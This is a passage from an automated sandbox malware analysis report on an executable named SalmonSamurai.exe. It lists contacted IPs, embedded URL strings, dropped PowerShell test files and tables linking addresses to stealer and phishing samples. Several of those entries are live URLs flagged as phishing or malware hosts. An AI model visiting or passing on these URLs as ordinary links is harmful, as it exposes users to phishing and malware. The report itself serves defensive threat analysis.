                                                                                                                                                                                              https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://doh.cleanbrowsing.org/doh/adult-filterSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://doh-01.spectrum.com/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      89.187.28.253
                                                                                                                                                                                                      		unknownUkraine
                                                                                                                                                                                                      		39810UA-WICOMWiMAXUkraineAutonomousSystemUAfalse
                                                                                                                                                                                                      172.64.41.3
                                                                                                                                                                                                      		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1579955
                                                                                                                                                                                                      Start date and time:2024-12-23 16:50:23 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 11m 42s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:63
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:SalmonSamurai.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal42.evad.winEXE@77/139@2/2
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.251.40.163, 13.107.246.63, 20.109.210.53, 184.28.90.27
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                      • VT rate limit hit for: SalmonSamurai.exe

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      12:24:29API Interceptor373x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      172.64.41.3nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                            Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                              Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                      RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          chrome.cloudflare-dns.comhttps://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                          Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                          Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.61.3

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSMT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                                          Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                                          http://tax-com.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.203.198
                                                                                                                                                                                                                          https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.63.207
                                                                                                                                                                                                                          https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.69.226
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.95.235
                                                                                                                                                                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • 104.21.40.196
                                                                                                                                                                                                                          https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.18.16.155
                                                                                                                                                                                                                          https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.22.164
                                                                                                                                                                                                                          Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                          • 172.67.177.134
                                                                                                                                                                                                                          UA-WICOMWiMAXUkraineAutonomousSystemUAhttps://prosayverso.com.ar/BM2kli2PnglFe5rx0qi2PNk17Fe5RSNAs3RKdy9frGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 89.187.28.95
                                                                                                                                                                                                                          https://www.serserijeans.com/kdy9bFe5glari2Px0qak17sdy9nFe5k17Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 89.187.28.219
                                                                                                                                                                                                                          https://www.maultalk.com/url.php?to=https://www.serserijeans.com/gdy9haBM2BM2Fe5rss3RhBM2i2Pdk17x0qvi2PFe5nnaai2PrpWO3rk17dy9s3RWO3BM2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 89.187.28.219
                                                                                                                                                                                                                          https://fahrerdokument.com/zip3/Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                          • 89.187.28.179
                                                                                                                                                                                                                          https://forum.fontlab.com/index.php?thememode=full;redirect=https://ags.college/D5Qw4GQ3Ea4RAy2APw4GloTxB4GalP21z01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 89.187.28.92
                                                                                                                                                                                                                          EEad1s92K0.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 89.187.3.90
                                                                                                                                                                                                                          C6ego4oO3t.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 89.187.3.81

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllNativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                AyqwnIUrcz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                      9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                        ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            MayitaV16.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3008
                                                                                                                                                                                                                                              Entropy (8bit):5.486168185857723
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:XizsSU4y4RQmFoUeCamfm9qr9t5/78NQffiiuxJZKaVEouYAgwd64rHLjtvWb:XizlHyIFKL2O9qrh7KWKjJ5Eo9Adrxe
                                                                                                                                                                                                                                              MD5:1C9E2D02C96098B42F60D9435132B56E
                                                                                                                                                                                                                                              SHA1:4969E22BF059BFCD6AC4C67DAD7D60CE11F653A8
                                                                                                                                                                                                                                              SHA-256:A78134BBA0FD8E794B3197EE7F8B7E74A3C2444181562AF80A7533FD328DE63A
                                                                                                                                                                                                                                              SHA-512:10B5E519A96D93D07F74E5B220BCE40860654CFA773E92747E74B0E76D24244188C56C33BCD2333BB8F45BCB81CDD1425854250F9D34D4ED24732FF91F27CFAA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e.................................?.!............@..........H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_041kmwfv.323.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05anaqqr.00s.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ow1uit0.5vf.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hho04f1.yea.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33rrmpca.adg.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jnw0m40.1eb.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3luyahb3.4kk.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ukazz31.acq.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41xx5bkw.1hs.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4llcxcdq.2bn.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55nuko40.chy.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
